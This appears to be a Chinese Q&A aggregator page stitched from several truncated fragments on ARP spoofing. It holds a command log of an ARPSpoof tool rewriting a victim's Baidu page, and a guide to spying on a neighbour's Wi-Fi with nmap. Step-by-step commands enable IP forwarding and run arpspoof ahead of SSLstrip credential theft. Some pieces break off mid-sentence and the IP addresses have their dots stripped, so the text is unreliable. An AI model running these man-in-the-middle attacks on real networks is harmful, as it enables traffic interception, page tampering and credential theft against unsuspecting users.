
主要功能:ARP欺骗过程中进行数据修改,实现会话劫持攻击
说明: 本程序公开源代码,为了换取更多朋友的指教
实例: 欺骗1921680108访问百度网站的全过程(注:#后是我加的注释)
效果: 1921680108看到的百度首页只有一句话“Hack by cooldiyer”,攻击成功。
F:\arpspoof\Release>arpspoof /n
ARPSpoof 31b by CoolDiyer 06-10-30
[+] Replace Job file jobtxt release success # 利用程序自动生成的规则文件,就能搞定
F:\arpspoof\Release>arpspoof 19216801 1921680108 80 2 1 /r jobtxt
ARPSpoof 31b by CoolDiyer 06-10-30
Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加载文件jobtxt中的规则,可用arpspoof /n生成模板
Parsing rul <HEA ==> Hack by cooldiyer<noframes>
[+] Loaded 2 rules # 共加载了两条规则,如果文件格式不对,程序在这里会中断
Spoofing 19216801 <-> 1921680108 # 开始arpspoof欺骗,监视转发的数据包
[+] Caught 1921680108:4304 -> 2021082243:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串
Forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是
[+] Caught 2021082243:80 -> 1921680108:4304 #
Forwarding untouched packet of size 62
[+] Caught 1921680108:4304 -> 2021082243:80
Forwarding untouched packet of size 60
[+] Caught 1921680108:4304 -> 2021082243:80
Forwarding untouched packet of size 399
[+] Caught 2021082243:80 -> 1921680108:4304
Forwarding untouched packet of size 60
[+] Caught 2021082243:80 -> 1921680108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。
Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替换成了“Hack by cooldiyer<noframes>”
Done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)
[+] Caught 2021082243:80 -> 1921680108:4304
Forwarding untouched packet of size 1474
[+] Caught 1921680108:4304 -> 2021082243:80
Forwarding untouched packet of size 60
[+] Caught 2021082243:80 -> 1921680108:4304
Forwarding untouched packet of size 237
[+] Caught 1921680108:4304 -> 2021082243:80
Forwarding untouched packet of size 60
[+] Reseting # Ctrl+C,程序自动恢复受骗主机的ARP缓存
[-] Sleep 5s # 5秒退出
__________________________________________________________________________________
其它说明:
arpspoof 19216801 1921680108 80 2 1 /s snifflog
可保存数据到文件,
arpspoof 19216801 1921680108 80 2 1
只显示数据
被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件jobtxt
解析最厉害的中间人攻击方式之SSL欺骗
导言
在本文中,我们将研究SSL欺骗,这也是最厉害的中间人攻击方式,因为SSL欺骗可以通过利用人们信赖的服务来发动攻击。首先我们先讨论SSL连接的理论及其安全性问题,然后看看SSL连接如何被利用来发动攻击,最后与大家分享关于SSL欺骗的检测以及防御技巧。
SSL和>
你需要先定位到哪一个设备是你的邻居。MAC地址和IP地址的话从路由器设置的页面就可以看到,如果还想查看更多信息的话,Nmap是一款非常实用的工具。首先获得路由器网关的地址,我家Wi-Fi的路由器地址是19216801然后用Nmap扫描连接到该网络下的所有设备,图里1921680109就是我用来模拟邻居的另一台笔记本。不光IP和MAC地址可以显示,相应的设备信息(比如图中这个Huawei Technologies),用了什么什么 *** 作系统(OS details)都可以在nmap扫描的结果中看到。记好邻居的IP和你路由器的地址,我们接下来要用到。 中间人攻击 –所谓中间人攻击(MitM)指的是攻击者插入到正在交流的双方中间,窃取并修改其中的通信,而双方仍然认为自己正和对方一对一的直接交流。刚才有人说到现在很多网站用的都是>
本文将介绍在局域网内,如何监听受害者流量并通过 SSLstrip 攻击获取敏感信息,分为如下两步:
中间人攻击(man-in-the-middle),就是攻击者扮演中间人进行攻击,可以劫持一段会话,窃取凭证和其他机密信息。
ARP 协议负责通过 IP 地址找到 MAC 地址(物理地址 ),在以太网中,是利用 MAC 地址来通讯的。
ARP协议是这样工作的:如主机B需要给主机A(IP为1921681100)发送数据,为了知道谁是主机A,首先主机B发送一个广播包给网内所有机器“谁是192168110”,正常情况其他机器忽略该消息,仅主机A回复“我是192168110”,于是通信就可以开始。所有的主机维护他们自己的ARP缓存表,所以不会每一次都发送广播,ARP表中包含IP对应的MAC地址。
一、寻找目标
使用nmap命令扫描局域网,获得主机列表
如果所在局域网路由器地址是 192168161,可以使用 nmap -sP 192168161/24 扫描
-sP 表示使用 ping 方式扫描,192168161/24”表示扫描"192168161-19216816254"这个网段的所有机器。
二、开启 IP 转发
ARP欺骗一般目的是把自己伪装成网关,但如果不作处理,当被欺骗数据包到达后就会被本机丢弃(因为本机不是网关,不知道如何处理这类数据包),这当然是不允许的。开启IP转发功能可以解决该问题,IP转发负责把该类数据包再转发给真正的网关处理,开启IP转发的方法
mac 下:
sysctl -w netinetipforwarding=1
linux 下:
echo1 >/proc/sys/net/ipv4/ip_forward
三、ARP 欺骗
假设被攻击的 IP 是 19216816134,局域网的网关是 192168161,攻击电脑使用的网卡接口是 en0(可以使用 ifconfig 命令查看), 则欺骗命令如下:
arpspoof -i en0 -t 19216816134 192168161
四、分析数据
如果 ARP 欺骗成功,则被攻击的设备会把所有数据先传到我们电脑上,接下来可以使用 wireshark 软件来分析数据。
至此,中间人攻击完成,接下来可以开始进行 SSLstrip 攻击。
SSLstrip 也叫 >
地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。
地址解析协议是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。
扩展资料:
RARP和ARP不同,地址解析协议是根据IP地址获取物理地址的协议,而反向地址转换协议(RARP)是局域网的物理机器从网关服务器的ARP表或者缓存上根据MAC地址请求IP地址的协议,其功能与地址解析协议相反。与ARP相比,RARP的工作流程也相反。首先是查询主机向网路送出一个RARP Request广播封包,向别的主机查询自己的IP地址。这时候网络上的RARP服务器就会将发送端的IP地址用RARP Reply封包回应给查询者,这样查询主机就获得自己的IP地址了。
参考资料来源:百度百科-TCP/IP协议
参考资料来源:百度百科-地址解析协议
以上就是关于ARP欺骗的利用和如何构建虚拟局域网全部的内容,包括:ARP欺骗的利用和如何构建虚拟局域网、路由器被ssl中间人攻击怎么办、怎么知道邻居用我家的wifi登陆了哪些网站等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)